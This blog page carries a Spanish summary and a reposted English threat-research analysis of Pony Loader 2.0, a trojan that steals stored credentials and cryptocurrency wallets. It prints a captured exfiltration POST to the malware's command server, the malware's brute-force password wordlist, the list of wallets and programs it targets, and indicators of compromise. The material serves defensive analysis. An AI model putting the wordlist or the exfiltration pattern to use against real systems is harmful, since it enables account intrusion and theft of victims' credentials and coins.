Pony Loader 2.0 roba billeteras virtuales como Bitcoin y Litecoin
Hace poco tiempo, este troyano que también se ha utilizado para propagar Zeus y Cryptolocker, fue rediseñado para robar billeteras virtuales. Esto no es del todo sorprendente si tenemos en cuenta que el código fuente de Pony Loader 2.0 había sido puesto en venta en mayo de este año.El troyano conocido como Pony o Fareit fue rediseñado: después de que su código fuente se pusiera a la venta, Pony Loader 2.0 roba credenciales de diversas billeteras virtuales y las envía a un servidor remoto.
Las billeteras que esta amenaza tiene como blanco incluyen a Bitcoin, Litecoin, MultiBit, Namecoin, Terracoin, Primecoin, Feathercoin, NovaCoin, MegaCoin, Digitalcoin, Zetacoin, Fastcoin, Tagcoin, Bytecoin, Florincoin, and Luckycoin, y muchas otras figuran en el listado publicado por investigadores de seguridad de Damballa.
Pony Loader 2.0 mantiene su capacidad para robar contraseñas y propagar otros tipos de malware, y contiene una lista de palabras que se utilizan para ejecutar ataques de fuerza bruta en cuentas de usuarios, según la publicación de Damballa. Estas palabras fueron tomadas de listados publicados anteriormente después de ataques a diversos servicios, y se agregaron las siguientes:
1234567890
administrator
Administrator
billgates
gates
gfhjkm
ghbdtn
guest
Guest
helpassistant
HelpAssistant
mustdie
windows
administrator
Administrator
billgates
gates
gfhjkm
ghbdtn
guest
Guest
helpassistant
HelpAssistant
mustdie
windows
Se cree que los comerciantes del código malicioso son de Rusia, y que están ofreciendo funcionalidades adicionales relacionadas a mejoras en la recolección de credenciales.
El troyano puede infectar a los usuarios a través de enlaces maliciosos en correos electrónicos o exploit kits, por lo que les recomendamos estar alertas para no caer víctimas de esta amenaza. La recomendación de Bitcoin es actualizar a las versiones más recientes del cliente, que incorporan un sistema para cifrar con contraseña las claves privadas contenidas en el monedero.
Pony Loader 2.0 Steals Credentials and Bitcoin Wallets: Source Code for Sale
Pony Loader malware has been around for years. The source code for version 1.9 was leaked on the Internet, giving criminals the opportunity to modify it to their liking. Recently, Damballa’s Threat Research team observed Pony Loader version 2.0. This variant, which ups the potential payday for criminals, is also up for sale.
On May 28, 2014, the Damballa Threat Research team obtained an unknown malware sample for analysis. After performing an initial analysis, we observed HTTP traffic to the domain 602ef0b0[.]pw, which was hosted at CloudFlare global CDN (content delivery network). CloudFlare is a legitimate network used to ensure the availability and security of websites. Malware authors commonly attempt to host their malware using known, trusted infrastructure in an effort to avoid detection and make their traffic more difficult to identify and block.
Pony Loader, also referred to as Fareit, has been used over the past several years and has the ability to steal sensitive information from a victim’s computer and install additional malware. This may include stored credentials for email, web and FTP accounts. In the past, Pony has been used to distribute the P2P Gameover Zeus Trojan.
The Pony source code has been leaked on the Internet (version 1.9), which allows anyone to obtain the source and modify it for use in an attack campaign. Upon execution of this binary, we observed the following HTTP POST request sent to the command and control server:
===========================================================================
POST /llfrty.php HTTP/1.0
Host: 602ef0b0.pw
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 375
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.2; .NET CLR 2.0.50727)
..6.,..D…a.;@.Q..q1O%.=..Y.n.n…….U..
.2.XI\.!…….^”…/.SU.%…^.$..0…..R<.u..e.a..k.i….Z.g…A.H….b……Db.N
……..CD….=l….+._i`.l.%…….o#.`.MW.l.o.2. %x.I…-..m……….>..;.n..Q..:.9…*…3b……a”8V.S…
…9…kSN.7>.[6..C..r.aSF.....Ly\.T.9..........H.oF7(T.(.#.M...P(.....`$.....1.\2..
{......P|<Z%......v.m[.Y....g..s.3U_N
n.|.WB...`..?...A
===========================================================================
After identifying this malware as Pony / Fareit, we posted some initial information to a security mailing list. CloudFlare analysts were able to identify and suspend the account, preventing future C2 communications at the listed domain.
This version of Pony is not just the old dropper and credential stealer that has been seen with version 1.9. This Pony Loader sample had been updated to steal a victim's bitcoin wallet as well. This particular version is being sold on the criminal market as Pony Loader version 2.0.
This version was listed for sale in May 2014. However, Pony Loader 2.0 has been circulating on the Internet since early 2014. Now that the source is listed for sale, Damballa Researchers expect to see an increase in this type of bitcoin stealing malware with customized capabilities.
Pony Loader 1.9 contains a wordlist used to brute-force user accounts on a victim's computer that is also present in version 2.0. The attackers obtained the password list from some of the top passwords associated with several database hacks. The password list was obtained from:
Several passwords were added to this list:
1234567890
administrator
Administrator
billgates
gates
gfhjkm
ghbdtn
guest
Guest
helpassistant
HelpAssistant
mustdie
windows
The wordlist is used to enumerate local passwords with the LogonUserA Windows API call.
The criminals attempting to sell the source code for Pony 2.0 advertise the bitcoin programs that are targeted in the updated version. Damballa has verified the following list of bitcoin software in Pony version 2.0:
Electrum, MultiBit, Litecoin, Namecoin, Terracoin, Bitcoin Armory, PPCoin (Peercoin), Primecoin, Feathercoin, NovaCoin, Freicoin, Devcoin, Frankocoin, ProtoShares, MegaCoin, Quarkcoin, Worldcoin, Infinitecoin, Ixcoin, Anoncoin, BBQcoin, Digitalcoin, Mincoin, Goldcoin, Yacoin, Zetacoin, Fastcoin, I0coin, Tagcoin, Bytecoin, Florincoin, Phoenixcoin, Luckycoin, Craftcoin, Junkcoin and the original Bitcoin client.
In addition, the sellers are marketing additional features and 'upgrades' as follows - Russian to English translation:
[+] Implemented collection of Ya.Browser passwords, FTP Disk, new versions of Opera (code-based Chrome)[*] When the program on behalf of the user SYSTEM (service Windows) will now run the loader file as an active session (logged on) Users[*] Improved collect passwords Firefox, is no longer dependent on the availability of libraries SQLite3[+] Optional redundant bootloader mode: if successfully loaded the first file – the rest will be skipped[+] Added option to disable the collection of passwords (just leave the loader)[-] Fixed processing SQLite3 files for Chrome / Firefox containing 48 bit integers[-] Fixed a serious bug in several functions, which could lead to errors in the collection of passwords and reach program
Implemented instantaneous decoding of saved passwords for the following programs:
FAR Manager FTPGetter Pocomail Total Commander ALFTP IncrediMail WS_FTP Internet Explorer The Bat! CuteFTP Dreamweaver Outlook FlashFXP DeluxeFTP Thunderbird FileZilla Google Chrome FastTrackFTP FTP Commander Chromium / SRWare Iron Bitcoin BulletProof FTP ChromePlus Electrum SmartFTP Bromium (Yandex Chrome) MultiBit TurboFTP Nichrome FTP Disk FFFTP Comodo Dragon Litecoin CoffeeCup FTP / Sitemapper RockMelt Namecoin CoreFTP K-Meleon Terracoin FTP Explorer Epic Bitcoin Armory Frigate3 FTP Staff-FTP PPCoin (Peercoin) SecureFX AceFTP Primecoin UltraFXP Global Downloader Feathercoin FTPRush FreshFTP NovaCoin WebSitePublisher BlazeFTP Freicoin BitKinex NETFile Devcoin ExpanDrive GoFTP Frankocoin ClassicFTP 3D-FTP ProtoShares Fling Easy FTP MegaCoin SoftX Xftp Quarkcoin Directory Opus FTP Now Worldcoin FreeFTP / DirectFTP Robo-FTP Infinitecoin LeapFTP LinasFTP Ixcoin WinSCP Cyberduck Anoncoin 32bit FTP Putty BBQcoin NetDrive Notepad + + Digitalcoin WebDrive CoffeeCup Visual Site Designer Mincoin FTP Control FTPShell Goldcoin Opera FTPInfo Yacoin WiseFTP NexusFile Zetacoin FTP Voyager FastStone Browser Fastcoin Firefox CoolNovo I0coin FireFTP WinZip Tagcoin SeaMonkey Yandex.Internet / Ya.Browser Bytecoin Flock MyFTP Florincoin Mozilla sherrod FTP Phoenixcoin LeechFTP NovaFTP Luckycoin Odin Secure FTP Expert Windows Mail Craftcoin WinFTP Windows Live Mail Junkcoin FTP Surfer Becky!
See original postings on pastebin.com here:
The builder is still being marketed with the source code and makes creating the virus possible using only a few mouse clicks:
Damballa Threat Researchers are continuing to investigate the use of this malware on the Internet. Given the capability to steal stored credentials from a wide variety of software, users should consider storing their passwords and bitcoin private keys using these programs risky.
“Your wallet.dat file is not encrypted by the Bitcoin program by default but the most current release of the Bitcoin client provides a method to encrypt with a passphrase the private keys stored in the wallet. Anyone who can access an unencrypted wallet can easily steal all of your coins. Use one of these encryption programs if there is any chance someone might gain access to your wallet.” – https://en.bitcoin.it/wiki/Securing_your_wallet#General_Solutions
More references:
https://en.bitcoin.it/wiki/Securing_your_wallet#Password_Strength
https://en.bitcoin.it/wiki/Wallet
https://en.bitcoin.it/wiki/Securing_your_wallet#Password_Strength
https://en.bitcoin.it/wiki/Wallet
Indicators:
143c9261b19118863882a2e9793d0840 – MD5 hash
602ef0b0.pw – Domain
– Isaac Palmer,
Malware Reverse Engineer
Malware Reverse Engineer
Donaciones
BTC: 1Eb6A6M3iH3eyX5Q7DVnvDWBLAmjKi3ae5
No hay comentarios:
Publicar un comentario